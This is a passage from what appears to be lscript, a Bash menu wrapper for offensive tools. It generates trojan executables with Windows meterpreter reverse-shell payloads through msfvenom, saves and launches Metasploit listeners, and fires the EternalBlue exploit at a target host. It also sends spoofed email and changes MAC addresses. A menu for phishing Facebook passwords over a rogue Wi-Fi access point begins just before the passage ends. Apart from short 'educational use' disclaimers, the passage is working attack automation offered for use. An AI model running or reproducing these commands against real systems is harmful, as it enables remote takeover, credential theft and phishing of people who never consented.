6061 echo -e ""$YS" 1"$CE") Create payload with msfvenom"
6062 echo -e ""$YS" 2"$CE") Create listener"
6063 echo -e ""$YS" 3"$CE") Saved listeners"
6064 echo -e ""$YS" 4"$CE") Start msfconsole"
6065 echo -e ""$YS" 5"$CE") Update msfconsole"
6066 echo -e ""$YS" 6"$CE") Armitage"
6067 echo -e ""$YS" 7"$CE") Findsploit"
6068 echo -e ""$YS" b"$CE") Go back"
6069 echo -e ""$YS" 0"$CE") EXIT"
6070 echo -e "Choose: "
6071 read -e METASP
6072 clear
6073 if [[ "$METASP" = "1" ]]
6074 then
6075 PAYLOADL=""
6076 echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
6077 read PAYLOADL
6078 if [[ -z "$PAYLOADL" ]]
6079 then
6080 echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
6081 sleep 2
6082 PAYLOADL="windows/meterpreter/reverse_tcp"
6083 fi
6084 echo -e "LHOST: "
6085 read ATIP
6086 echo -e ""
6087 echo -e "LPORT: "
6088 read ATPORT
6089 echo -e ""
6090 echo -e "Enter the target's architecture("$YS"x86"$CE"/"$YS"x64"$CE"): "
6091 read TARCH
6092 echo -e "Enter the name of the payload(e.g: "$YS"trojan2"$CE"): "
6093 read ATEXE
6094 ATEXEPATH="/root/Desktop/$ATEXE.exe"
6095 clear
6096 echo -e "Generating"
6097 sleep 0.1
6098 echo .
6099 sleep 0.1
6100 echo .
6101 sleep 0.1
6102 echo .
6103 sleep 0.1
6104 echo .
6105 sleep 0.1
6106 echo .
6107 sleep 0.1
6108 echo .
6109 if [[ "$TARCH" = "x64" ]]
6110 then
6111 msfvenom -p $PAYLOADL --platform windows -a x64 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
6112 else
6113 msfvenom -p $PAYLOADL --platform windows -a x86 -f exe -e x86/shikata_ga_nai LHOST="$ATIP" LPORT="$ATPORT" -o "$ATEXEPATH"
6114 fi
6115 echo -e "Done."
6116 echo -e ""
6117 echo -e "$PAKTC"
6118 $READAK
6119 clear
6120 echo -e "Create a listener for this payload? $YNYES "
6121 read PAYL
6122 if [[ "$PAYL" != "n" ]]
6123 then
6124 echo -e "Name of listener(e.g: "$YS"john"$CE") : "
6125 read NAMEL
6126 echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
6127 echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
6128 echo "set LHOST $ATIP " >> "$LPATH"/rc/"$NAMEL".rc
6129 echo "set LPORT $ATPORT " >> "$LPATH"/rc/"$NAMEL".rc
6130 echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
6131 echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
6132 clear
6133 echo -e "Launch the listener now? "$YNONLY""
6134 read LLN
6135 if [[ "$LLN" = "y" ]]
6136 then
6137 echo -e "Launching msfconsole..."
6138 sleep 2
6139 clear
6140 msfconsole -r "$LPATH"/rc/"$NAMEL".rc
6141 fi
6142 fi
6143 elif [[ "$METASP" = "z" ]]
6144 then
6145 clear
6146 echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
6147 sleep 3
6148 echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
6149 read MUSTBEYES
6150 if [[ "$MUSTBEYES" = "YES" ]]
6151 then
6152 clear
6153 cd /root/zirikatu
6154 ./zirikatu.sh
6155 fi
6156 elif [[ "$METASP" = "2" ]]
6157 then
6158 clear
6159 echo -e "LHOST: "
6160 read LHOSTL
6161 echo -e "LPORT: "
6162 read LPORTL
6163 echo -e "PAYLOAD (Default: "$YS"windows/meterpreter/reverse_tcp"$CE"): "
6164 read PAYLOADL
6165 if [[ -z "$PAYLOADL" ]]
6166 then
6167 echo -e "Setting PAYLOAD to windows/meterpreter/reverse_tcp"
6168 sleep 2
6169 PAYLOADL="windows/meterpreter/reverse_tcp"
6170 fi
6171 echo -e "Name of listener(e.g: "$YS"john"$CE") : "
6172 read NAMEL
6173 echo "use exploit/multi/handler" > "$LPATH"/rc/"$NAMEL".rc
6174 echo "set PAYLOAD $PAYLOADL " >> "$LPATH"/rc/"$NAMEL".rc
6175 echo "set LHOST $LHOSTL " >> "$LPATH"/rc/"$NAMEL".rc
6176 echo "set LPORT $LPORTL " >> "$LPATH"/rc/"$NAMEL".rc
6177 echo "set ExitOnSession false" >> "$LPATH"/rc/"$NAMEL".rc
6178 echo "exploit -j" >> "$LPATH"/rc/"$NAMEL".rc
6179 clear
6180 echo -e "Launch the listener now? "$YNONLY""
6181 read LLN
6182 if [[ "$LLN" = "y" ]]
6183 then
6184 echo -e "Launching msfconsole..."
6185 sleep 2
6186 clear
6187 msfconsole -r "$LPATH"/rc/"$NAMEL".rc
6188 fi
6189 elif [[ "$METASP" = "3" ]]
6190 then
6191 while true
6192 do
6193 clear
6194 ls -w 1 "$LPATH"/rc
6195 echo -e ""
6196 echo -e ""
6197 echo -e "Enter the name of the listener you want to select(e.g: "$YS"john"$CE")"
6198 echo -e ""$YS" r"$CE") Delete all saved listeners"
6199 echo -e ""$YS" b"$CE") Go back"
6200 read NAMERC
6201 clear
6202 if [[ "$NAMERC" = "back" || "$NAMERC" = "b" ]]
6203 then
6204 break
6205 elif [[ "$NAMERC" = "reset" || "$NAMERC" = "r" ]]
6206 then
6207 rm -f "$LPATH"/rc/*
6208 continue
6209 fi
6210 if [[ ! -f "$LPATH"/rc/"$NAMERC" ]]
6211 then
6212 NAMERC="$NAMERC".rc
6213 if [[ ! -f "$LPATH"/rc/"$NAMERC" ]]
6214 then
6215 echo -e "File not found. Try again.."
6216 sleep 2
6217 continue
6218 fi
6219 fi
6220 while true
6221 do
6222 clear
6223 echo -e ""$NAMERC" selected."
6224 echo -e ""$YS" 1"$CE") Start listener"
6225 echo -e ""$YS" 2"$CE") Delete listener"
6226 echo -e ""$YS" b"$CE") Go back"
6227 echo -e "Choose: "
6228 read LISTL
6229 if [[ "$LISTL" = "1" ]]
6230 then
6231 msfconsole -r "$LPATH"/rc/"$NAMERC"
6232 elif [[ "$LISTL" = "2" ]]
6233 then
6234 rm "$LPATH"/rc/"$NAMERC"
6235 break
6236 elif [[ "$LISTL" = "back" || "$LISTL" = "b" ]]
6237 then
6238 break
6239 fi
6240 done
6241 done
6242 elif [[ "$METASP" = "4" ]]
6243 then
6244 msfconsole
6245 elif [[ "$METASP" = "5" ]]
6246 then
6247 msfupdate
6248 elif [[ "$METASP" = "6" ]]
6249 then
6250 service postgresql start
6251 armitage
6252 clear
6253 elif [[ "$METASP" = "7" ]]
6254 then
6255 findsploit_menu
6256 elif [[ "$METASP" = "back" || "$METASP" = "b" ]]
6257 then
6258 BACKL="1"
6259 break
6260 elif [[ "$METASP" = "00" ]]
6261 then
6262 exec bash "$0"
6263 elif [[ "$METASP" = "0" ]]
6264 then
6265 clear
6266 exit
6267 fi
6268 done
6269}
6270function update_lscript
6271{
6272 echo -e "Checking for updates..."
6273 TESTINTERNETCONNECTION=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
6274 if [[ "$TESTINTERNETCONNECTION" != "" ]]
6275 then
6276 VER=$(timeout -s SIGTERM 20 curl "https://raw.githubusercontent.com/arismelachroinos/lscript/master/version.txt" 2>/dev/null)
6277 if [[ "$VERSION" != "$VER" ]]
6278 then
6279 clear
6280 echo -e "There is an update available."
6281 echo -e "Current version: $VERSION"
6282 echo -e "Updated version: $VER"
6283 echo -e "$PAKTC"
6284 $READAK
6285 clear
6286 echo -e "Do you want to update?"$YNONLY": "
6287 read UPDATEYN
6288 if [[ "$UPDATEYN" = "y" ]]
6289 then
6290 clear
6291 #~ echo -e "Making new directory for the old lscript (will pass it to /root/lscriptold)"
6292 sleep 1
6293 if [[ -d /root/lscriptold ]]
6294 then
6295 rm -r /root/lscriptold
6296 fi
6297 mkdir /root/lscriptold
6298 echo -e ""
6299 #~ echo -e "Moving lscript to lscriptold"
6300 sleep 1
6301 mv "$LPATH" /root/lscriptold
6302 #~ echo -e "Cloning the latest github version to new "$LPATH""
6303 sleep 1
6304 cd
6305 git clone https://github.com/arismelachroinos/lscript.git
6306 cd "$LPATH"
6307 chmod +x install.sh
6308 clear
6309 sleep 1
6310 if [[ -f /root/lscriptold/lscript/IAGREE.txt ]]
6311 then
6312 cp /root/lscriptold/lscript/IAGREE.txt "$LPATH"
6313 fi
6314 if [[ -d /root/lscriptold/lscript/ks ]]
6315 then
6316 echo -e "Copying your shortcuts"
6317 cp -r /root/lscriptold/lscript/ks "$LPATH"
6318 echo -e "Done."
6319 sleep 0.2
6320 fi
6321 if [[ -d /root/lscriptold/lscript/settings ]]
6322 then
6323 echo -e "Copying your settings"
6324 cp -r /root/lscriptold/lscript/settings "$LPATH"
6325 echo -e "Done."
6326 sleep 0.2
6327 fi
6328 if [[ -f /root/lscriptold/lscript/wlanmon.txt ]]
6329 then
6330 echo -e "Copying your interfaces"
6331 cp /root/lscriptold/lscript/wlanmon.txt "$LPATH"
6332 echo -e "Done."
6333 sleep 0.2
6334 fi
6335 echo -e ""
6336 if [[ -f /root/lscriptold/lscript/wlan.txt ]]
6337 then
6338 cp /root/lscriptold/lscript/wlan.txt "$LPATH"
6339 echo -e "Done."
6340 sleep 0.2
6341 clear
6342 fi
6343 echo -e "$PAKTC"
6344 $READAK
6345 cd "$LPATH"
6346 gnome-terminal -e ./install.sh
6347 clear
6348 sleep 1
6349 rm -rf /root/lscriptold
6350 echo -e "Exiting..."
6351 sleep 1
6352 kill -9 $PPID
6353 else
6354 clear
6355 echo -e "You didnt select "y" so you go back..."
6356 sleep 3
6357 exec bash "$0"
6358 fi
6359 else
6360 echo -e "There is no update available"
6361 sleep 1
6362 echo -e "Installed version: $VERSION"
6363 sleep 1
6364 echo -e "Github version: $VER"
6365 sleep 1
6366 echo -e "$PAKTGB"
6367 $READAK
6368 exec bash "$0"
6369 fi
6370 else
6371 clear
6372 echo -e "There is no connection."
6373 sleep 1
6374 echo -e "Maybe you should type 'stop' in the main manu to gain internet access again"
6375 echo -e ""
6376 echo -e "$PAKTGB"
6377 $READAK
6378 exec bash "$0"
6379 fi
6380}
6381function hidden_shortcuts
6382{
6383 clear
6384 TERMINALTITLE="HIDDEN SHORTCUTS"
6385 dash_calc
6386 printf '\033]2;HIDDEN SHORTCUTS\a'
6387 echo -e ""$YS" interface"$CE") Change your interface"
6388 echo -e ""$YS" wififb"$CE") Create open wifi access point and get fb passwords with wifiphisher"
6389 echo -e ""$YS"eternalblue"$CE") Launch msfconsole with eternalblue exploit on target"
6390 echo -e ""$YS" etercheck"$CE") Check if a target is vulnerable to eternalblue exploit"
6391 echo -e ""$YS" changelog"$CE") View the changelog of the lscript versions"
6392 echo -e ""$YS" pstart"$CE") Service postgresql start"
6393 echo -e ""$YS" pstop"$CE") Service postgresql stop"
6394 echo -e ""$YS" nstart"$CE") Service NetworkManager start"
6395 echo -e ""$YS" nstop"$CE") Service NetworkManager stop"
6396 echo -e ""$YS" astart"$CE") Service apache2 start"
6397 echo -e ""$YS" astop"$CE") Service apache2 stop"
6398 echo -e ""$YS"nessusstart"$CE") Start Nessus"
6399 echo -e ""$YS" nessusstop"$CE") Stop Nessus"
6400 echo -e "$PAKTGB"
6401 $READAK
6402 clear
6403}
6404function one_time_per_launch_ks
6405{
6406 if [[ -d ""$KSPATH"/nums" ]]
6407 then
6408 rm -r "$KSPATH"/nums
6409 fi
6410 mkdir "$KSPATH"/nums
6411 nn=1
6412 ff=1
6413 HOWMANY=0
6414 HOWADD=$(( HOWMANYTOOLS + 1 ))
6415 while [[ "$nn" != "$HOWADD" ]]
6416 do
6417 listshortcuts
6418 if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]]
6419 then
6420 echo -e "$TITLE" > "$KSPATH"/nums/"$ff".txt
6421 ff=$(( ff+1 ))
6422 HOWMANY=$(( HOWMANY+1 ))
6423 fi
6424 nn=$(( nn+1 ))
6425
6426 done
6427 ONETIMEPERLAUNCH="1"
6428}
6429function interface_menu
6430{
6431 WLANN=$(cat "$LPATH"/wlan.txt)
6432 WLANNM=$(cat "$LPATH"/wlanmon.txt)
6433 echo -e "Your current wireless interface names are $WLANN and $WLANNM"
6434 sleep 2
6435 echo -e "Do you want to change you interface names?"$YNYES": "
6436 read INAG
6437 if [[ "$INAG" = "n" ]]
6438 then
6439 clear
6440 echo -e "Then why did you come here? lol"
6441 sleep 3
6442 exec bash "$0"
6443 else
6444 clear
6445 rm "$LPATH"/wlan.txt
6446 rm "$LPATH"/wlanmon.txt
6447 set_interface_number
6448 fi
6449}
6450function tools_menu
6451{
6452 while true
6453 do
6454 clear
6455 TERMINALTITLE="TOOLS"
6456 dash_calc
6457 printf '\033]2;TOOLS\a'
6458 echo -e ""$YS" 1"$CE") Wifi tools"
6459 echo -e ""$YS" 2"$CE") Remote access"
6460 echo -e ""$YS" 3"$CE") Information gathering"
6461 echo -e ""$YS" 4"$CE") Webside tools"
6462 echo -e ""$YS" 5"$CE") Others"
6463 echo -e ""$YS" 6"$CE") Install/reinstall a tool"
6464 echo -e ""$YS" i"$CE") Info"
6465 echo -e ""$YS" b"$CE") Go back"
6466 #~ echo -e ""$YS"00"$CE") Main menu"
6467 echo -e ""$YS" 0"$CE") EXIT"
6468 echo "Choose: "
6469 read -e CATEG
6470 clear
6471 if [[ "$CATEG" = "1" ]]
6472 then
6473 wifi_tools
6474 elif [[ "$CATEG" = "2" ]]
6475 then
6476 remote_access
6477 elif [[ "$CATEG" = "3" ]]
6478 then
6479 information_gathering
6480 elif [[ "$CATEG" = "4" ]]
6481 then
6482 website_tools
6483 elif [[ "$CATEG" = "5" ]]
6484 then
6485 other_tools
6486 elif [[ "$CATEG" = "6" ]]
6487 then
6488 NOCONFIRM=0
6489 reinstall_tools
6490 NOCONFIRM=0
6491 elif [[ "$CATEG" = "0" ]]
6492 then
6493 clear
6494 exit
6495 elif [[ "$CATEG" = "back" || "$CATEG" = "b" || "$CATEG" = 00 ]]
6496 then
6497 BACKL="1"
6498 break
6499 elif [[ "$CATEG" = "i" ]]
6500 then
6501 TERMINALTITLE="INFO"
6502 dash_calc
6503 printf '\033]2;INFO\a'
6504 echo -e ""$LGYS"Wifi tools:"
6505 echo -e " Mostly focused on network attacks, MITM, DoS, evil-twin and phishing."
6506 echo -e "Remote access:"
6507 echo -e " Mostly focused on payload generation, listeners, exploits, scanners"
6508 echo -e " and bypassing anti-virus software."
6509 echo -e "Information gathering:"
6510 echo -e " Self-explained."
6511 echo -e "Other tools:"
6512 echo -e " Some very usefull tools that don't fit to the other categories."
6513 echo -e "Install/reinstall a tool:"
6514 echo -e " From here you can install any tool available in the lazy script."
6515 echo -e " If it is already installed, it will be deleted and reistalled."$CE""
6516 echo -e ""
6517 echo -e ""$BS"Do you want another tool to be added in the script?"$CE""
6518 echo -e ""$BS"Submit it as an issue on my github repo:"$CE""
6519 echo -e " "$YS"https://github.com/arismelachroinos/lscript"$CE""
6520 echo -e ""
6521 echo -e ""
6522 echo -e "$PAKTGB"
6523 $READAK
6524 fi
6525 done
6526}
6527function public_ip
6528{
6529 clear
6530 echo -e ""$BS"Please wait..."$CE""
6531 CHECKMON=$(ifconfig | grep "mon")
6532 if [[ "$CHECKMON" = "" ]]
6533 then
6534 clear
6535 PUBLICIP=$(curl -s ipinfo.io/ip)
6536 if [[ "$PUBLICIP" = "" ]]
6537 then
6538 PUBLICIP=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
6539 if [[ "$PUBLICIP" = "" ]]
6540 then
6541 clear
6542 PUBLICIP="Connection error."
6543 fi
6544 fi
6545 echo "Your public IP is: "$PUBLICIP""
6546 #~ curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//'
6547 else
6548 echo -e "When monitor mode is enabled, you don't have internet access."
6549 echo -e "Select 'd2' to disable monitor mode"
6550 echo -e "$PAKTGB"
6551 $READAK
6552 clear
6553 exec bash "$0"
6554 fi
6555}
6556function terms_of_use
6557{
6558 printf '\033]2;TERMS OF USE\a'
6559 clear
6560 echo -e ""$RS"You need to accept the terms."$CE""
6561 sleep 1
6562 echo -e "$PAKTC"
6563 $READAK
6564 clear
6565 echo -e "This tool is only for educational purposes only."
6566 echo -e "Use this tool only on your own network and never without permission."
6567 echo -e "I am not responsible for anything you do with this tool."
6568 echo -e "Will you use this tool only on your own network and only with your own responsibility?("$YS"YES"$CE"/"$YS"NO"$CE"): "
6569 read YESORNO
6570 if [[ "$YESORNO" = "YES" ]]
6571 then
6572 echo "You have agreed the terms and you use this tool with your own responsibility." > "$LPATH"/IAGREE.txt
6573 sleep 1
6574 clear
6575 else
6576 echo -e "You didn't type 'YES' , so you cannot continue"
6577 sleep 4
6578 fi
6579 exec bash "$0"
6580}
6581function eternalblue
6582{
6583 if [[ ! -d "$LPATH"/rce ]]
6584 then
6585 mkdir "$LPATH"/rce
6586 fi
6587 EG=$(local_ips $WLANN)
6588 if [[ "$EG" != "" ]]
6589 then
6590 echo -e "LHOST: ("$YS""Enter""$CE"="$EG") "
6591 else
6592 echo -e "LHOST: "
6593 fi
6594 read LHOSTL
6595 if [[ "$EG" != "" && "$LHOSTL" = "" ]]
6596 then
6597 LHOSTL="$EG"
6598 fi
6599 echo -e "RHOST: "
6600 read RHOSTL
6601 echo -e "TARGETARCHITECTURE("$YS"x86"$CE"/"$YS"x64"$CE"): "
6602 read TARGETARCHL
6603 if [[ "$TARGETARCHL" = "x64" ]]
6604 then
6605 PROCESSINJECTL="lsass.exe"
6606 PAYLOADL="windows/x64/meterpreter/reverse_tcp"
6607 else
6608 PAYLOADL="windows/meterpreter/reverse_tcp"
6609 fi
6610 echo -e "TARGET("$YS"0"$CE"-"$YS"8"$CE"): "
6611 read TARGETL
6612 echo "use exploit/windows/smb/eternalblue_doublepulsar" > "$LPATH"/rce/eternalbluerc.rc
6613 echo "set LHOST "$LHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
6614 echo "set RHOST "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
6615 echo "set PAYLOAD "$PAYLOADL"" >> "$LPATH"/rce/eternalbluerc.rc
6616 echo "set TARGET "$TARGETL"" >> "$LPATH"/rce/eternalbluerc.rc
6617 echo "set TARGETARCHITECTURE "$TARGETARCHL"" >> "$LPATH"/rce/eternalbluerc.rc
6618 echo "set PROCESSINJECT "$PROCESSINJECTL"" >> "$LPATH"/rce/eternalbluerc.rc
6619 echo "show info" >> "$LPATH"/rce/eternalbluerc.rc
6620 echo "exploit -j" >> "$LPATH"/rce/eternalbluerc.rc
6621 msfconsole -r "$LPATH"/rce/eternalbluerc.rc
6622
6623}
6624function eternalblue_check
6625{
6626 if [[ ! -d "$LPATH"/rce ]]
6627 then
6628 mkdir "$LPATH"/rce
6629 fi
6630 echo -e "RHOST:("$BS"if scanning multiple hosts, seperate with space"$CE") "
6631 read RHOSTL
6632 echo "use auxiliary/scanner/smb/smb_ms17_010" > "$LPATH"/rce/eternalbluerc.rc
6633 echo "set RHOSTS "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
6634 echo "exploit" >> "$LPATH"/rce/eternalbluerc.rc
6635 echo -e ""$BS"Launching msfconsole. Please wait..."$CE""
6636 msfconsole -r "$LPATH"/rce/eternalbluerc.rc
6637
6638}
6639function start_menu
6640{
6641 O1=0
6642 O2=0
6643 O3=0
6644 echo -e "Enabling $WLANNM..."
6645 enable_wlan
6646 echo -e "Killing services..."
6647 airmon-ng check kill &> /dev/null && echo -e ""$YS"Done"$CE"" && O1=1
6648 echo -e "Starting monitor mode..."
6649 if [[ "$ALFA" = "yes" ]]
6650 then
6651 ifconfig $WLANN down
6652 iwconfig $WLANN mode monitor &> /dev/null && echo -e ""$YS"Done"$CE"" && O2=1
6653 ifconfig $WLANN up
6654 else
6655 airmon-ng start $WLANN | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1 &> /dev/null && echo -e ""$YS"Done"$CE"" && O2=1
6656 fi
6657 if [[ -f "$LPATH"/settings/startmac.txt ]]
6658 then
6659 read STARTMAC < "$LPATH"/settings/startmac.txt
6660 else
6661 STARTMAC="$DEFMAC"
6662 fi
6663 echo -e "Changing mac address of $WLANNM to "$STARTMAC"..."
6664 ifconfig $WLANNM down
6665 macchanger -m $STARTMAC $WLANNM &> /dev/null | grep "New MAC:" &> /dev/null && O3=1
6666 ifconfig $WLANNM up && echo -e ""$YS"Done"$CE""
6667 if [[ "$O1" = 1 && "$O2" = 1 && "$O3" = 1 && "$O4" = 1 ]]
6668 then
6669 BACKL=1
6670 fi
6671}
6672function stop_menu
6673{
6674 O1=0
6675 O2=0
6676 O3=0
6677 stop_monitor
6678 echo -e "Changing mac address of $WLANN to the original one..."
6679 ifconfig $WLANN down
6680 macchanger -p $WLANN | grep "Current MAC:" && O1=1
6681 ifconfig $WLANN up
6682 echo -e ""$YS"Done"$CE""
6683 if [[ "$O1" = 1 && "$O2" = 1 && "$O3" = 1 ]]
6684 then
6685 BACKL=1
6686 fi
6687}
6688function stop_monitor
6689{
6690 echo -e "Disabling $WLANNM..."
6691 echo -e "Stopping monitor mode..."
6692 if [[ "$ALFA" = "yes" ]]
6693 then
6694 A1=0
6695 A2=0
6696 A3=0
6697 ifconfig $WLANN down && A1=1
6698 iwconfig $WLANN mode managed && A2=1
6699 ifconfig $WLANN up && A3=1
6700 if [[ "$A1" = 1 && "$A2" = 1 && "$A3" = 1 ]]
6701 then
6702 echo -e ""$YS"Done"$CE"" && O2=1
6703 else
6704 echo -e ""$RS"Error stoping monitor mode."$CE""
6705 fi
6706 else
6707 airmon-ng stop $WLANNM &>/dev/null && echo -e ""$YS"Done"$CE"" && O2=1 || echo -e ""$RS"Error stoping monitor mode."$CE""
6708 fi
6709 echo -e "Starting NetworkManager service..."
6710 service NetworkManager start && echo -e ""$YS"Done"$CE"" && O3=1 || echo -e ""$RS"Error starting NetworkManager service"$CE""
6711}
6712function spoof_email
6713{
6714while true
6715do
6716 sm=0
6717 clear
6718 if [[ ! -d /bin/lscript/smtp ]]
6719 then
6720 mkdir /bin/lscript/smtp
6721 fi
6722 echo -e ""$RS"YOU SHOULD FIRST SIGN UP ON https://www.smtp2go.com AND VERIFY YOUR EMAIL."$CE""
6723 echo -e ""$RS"THEN GO TO https://app.smtp2go.com/settings/users AND MAKE A USERNAME AND PASS."$CE""
6724 echo -e ""$RS" ########ALWAYS HAVE PERMISSION OF THE EMAILS YOU SPOOF########"$CE""
6725 echo -e ""$RS" ########DONT SEND VIRUSES , PHISHING OR ILLEGAL THINGS########"$CE""
6726 if [[ ! -f /bin/lscript/smtp/smtpemail.txt ]]
6727 then
6728 echo -e ""$YS" 1"$CE") Set your SMTP username and pass "$RS"NOT SET"$CE""
6729 else
6730 read smtpemail < /bin/lscript/smtp/smtpemail.txt
6731 echo -e ""$YS" 1"$CE") Set your SMTP username and pass Current: "$YS""$smtpemail""$CE""
6732 fi
6733 echo -e ""$YS" 2"$CE") Send a spoofed email"
6734 echo -e ""$YS" 3"$CE") Clear your SMTP username and pass from lscript"
6735 echo -e ""$YS" 4"$CE") Fix email failed"
6736 echo -e ""$YS" b"$CE") Go back"
6737 echo -e ""$YS" 0"$CE") EXIT"
6738 read SMTP
6739 if [[ "$SMTP" = "1" ]]
6740 then
6741 clear
6742 echo -e "Enter your smtp username(find it here: https://app.smtp2go.com/settings/users ): "
6743 read SMTPEMAIL
6744 echo -e "Enter your smtp password(find it here: https://app.smtp2go.com/settings/users ): "
6745 read SMTPPASS
6746 clear
6747 echo "$SMTPEMAIL" > /bin/lscript/smtp/smtpemail.txt
6748 echo "$SMTPPASS" > /bin/lscript/smtp/smtppass.txt
6749 echo -e "Credentials saved on /bin/lscript/smtp"
6750 sleep 3
6751 elif [[ "$SMTP" = "4" ]]
6752 then
6753 clear
6754 echo -e "If you email fails, the reason is because on option 1 you didnt set the correct username and password. Find those at https://app.smtp2go.com/settings/users."
6755 sleep 2
6756 echo -e "$PAKTGB"
6757 read -e -n 1 -r
6758 elif [[ "$SMTP" = "3" ]]
6759 then
6760 if [[ -f /bin/lscript/smtp/smtpemail.txt ]]
6761 then
6762 rm /bin/lscript/smtp/smtpemail.txt
6763 echo -e "Username removed"
6764 else
6765 echo -e "Not username found"
6766 fi
6767 if [[ -f /bin/lscript/smtp/smtppass.txt ]]
6768 then
6769 rm /bin/lscript/smtp/smtppass.txt
6770 echo -e "Password removed"
6771 else
6772 echo -e "Not password found"
6773 fi
6774 sleep 2
6775 continue
6776 elif [[ "$SMTP" = "0" ]]
6777 then
6778 clear
6779 exit
6780 elif [[ "$SMTP" = "back" || "$SMTP" = "b" ]]
6781 then
6782 clear
6783 break
6784 elif [[ "$SMTP" = "2" ]]
6785 then
6786 while true
6787 do
6788 clear
6789 if [[ ! -f /bin/lscript/smtp/smtpemail.txt ]]
6790 then
6791 echo -e "No smtp username found."
6792 sm=1
6793 fi
6794 if [[ ! -f /bin/lscript/smtp/smtppass.txt ]]
6795 then
6796 echo -e "No smtp pass found."
6797 sm=1
6798 fi
6799 if [[ "$sm" = 1 ]]
6800 then
6801 break
6802 fi
6803 read smtppass < /bin/lscript/smtp/smtppass.txt
6804 read smtpemail < /bin/lscript/smtp/smtpemail.txt
6805 clear
6806 echo -e "Your username is "$RS""$smtpemail""$CE""
6807 echo -e ""
6808 echo -e "Enter the target's email: "
6809 read TARGETSEMAIL
6810 echo -e "Enter the email that you want the target to see: "
6811 read SPOOFEDEMAIL
6812 echo -e "Enter the subject of the message: "
6813 read SUBJECTEMAIL
6814 echo -e "Enter the message: "
6815 read MESSAGEEMAIL
6816 echo -e "Enter the smtp server ("$YS"Enter"$CE"=mail.smtp2go.com): "
6817 read SMTPSERVER
6818 if [[ "$SMTPSERVER" = "" ]]
6819 then
6820 SMTPSERVER="mail.smtp2go.com"
6821 fi
6822 echo -e "Enter the smtp port ("$YS"Enter"$CE"=2525): "
6823 read SMTPPORT
6824 if [[ "$SMTPPORT" = "" ]]
6825 then
6826 SMTPPORT="2525"
6827 fi
6828 echo -e "Press "$YS"enter"$CE" to send the message to "$TARGETSEMAIL""
6829 read
6830 clear
6831 sendemail -f $SPOOFEDEMAIL -t $TARGETSEMAIL -u $SUBJECTEMAIL -m $MESSAGEEMAIL -s "$SMTPSERVER":"$SMTPPORT" -xu "$smtpemail" -xp "$smtppass"
6832 echo -e "$PAKTGB"
6833 read -e -n 1 -r
6834 break
6835 done
6836 fi
6837done
6838}
6839function new_terminal
6840{
6841 while true
6842 do
6843 clear
6844 if [[ "$ALFA" = "yes" ]]
6845 then
6846 CHECKMON=$(iwconfig "$WLANN" | grep "Mode:Monitor")
6847 else
6848 CHECKMON=$(ifconfig | grep "$WLANNM")
6849 fi
6850 clear
6851 if [[ "$CHECKMON" = "" ]]
6852 then
6853 echo -e "Monitor mode is not enabled."
6854 echo -e ""
6855 echo -e "Do you want to enable monitor mode? "$YNYES": "
6856 read MONITOREN
6857 clear
6858 if [[ "$MONITOREN" = "n" ]]
6859 then
6860 #~ echo -e "Select 'start' or '2' to enable it"
6861 echo -e "$PAKTGB"
6862 $READAK
6863 clear
6864 exec bash "$0"
6865 else
6866 CHECKWL=$(ifconfig | grep "$WLANN")
6867 if [[ "$CHECKWL" == "" ]]
6868 then
6869 echo -e ""$RS""$WLANN" was not found"$CE""
6870 sleep 2
6871 BACKL=1
6872 break
6873 fi
6874 start_menu
6875 continue
6876 fi
6877 else
6878 if [[ "$YORNAA" = "10" ]]
6879 then
6880 echo -e "Moving into new terminal..."
6881 sleep 1
6882 FJC=0
6883 export FJC
6884 gnome-terminal --geometry 87x35+9999+0 -- lh1
6885 sleep 1
6886 exec bash "$0"
6887 break
6888 elif [[ "$YORNAA" = "11" ]]
6889 then
6890 clear
6891 echo -e "Moving into new terminal..."
6892 sleep 1
6893 gnome-terminal --geometry 80x25+9999+0 -- lh3
6894 sleep 1
6895 exec bash "$0"
6896 break
6897 elif [[ "$YORNAA" = "12" ]]
6898 then
6899 echo -e "Moving into new terminal..."
6900 sleep 1
6901 gnome-terminal --geometry 80x25+9999+0 -- lh4
6902 sleep 1
6903 exec bash "$0"
6904 break
6905 fi
6906 fi
6907 done
6908}
6909function check_if_ks
6910{
6911 while [ $var1 -le $HOWMANY ]
6912 do
6913 if [[ -f "$KSPATH"/nums/"$var1".txt ]]
6914 then
6915 read TITLE < "$KSPATH"/nums/"$var1".txt
6916 read YORNAKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
6917 if [[ "$YORNAA" = "$YORNAKS" ]]
6918 then
6919 read COMMAND1 < ""$KSPATH"/"$TITLE"/"$TITLE".txt"
6920 read COMMAND2 < ""$KSPATH"/"$TITLE"/"$TITLE"2.txt"
6921 $COMMAND1
6922 #~ if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"3.txt" ]]
6923 #~ then
6924 #~ read $COMMAND3 < ""$KSPATH"/"$TITLE"/"$TITLE"3.txt"
6925 #~ $COMMAND3
6926 #~ fi
6927 $COMMAND2
6928 BACKL="1"
6929 fi
6930 fi
6931 var1=$(( var1+1 ))
6932 done
6933}
6934function wififb_attack
6935{
6936
6937 while true
6938 do
6939 clear
6940 TERMINALTITLE="WIFIFB-MENU"
6941 dash_calc
6942 printf '\033]2;WIFIFB-MENU\a'
6943 echo -e ""$YS" 1"$CE") Start attack ("$BS"always end the attack with ESC"$CE")"
6944 echo -e ""$YS" 2"$CE") Check & save new passwords ("$BS"do it at the end of the attack"$CE")"
6945 echo -e ""$YS" 3"$CE") Show all-saved-passwords"
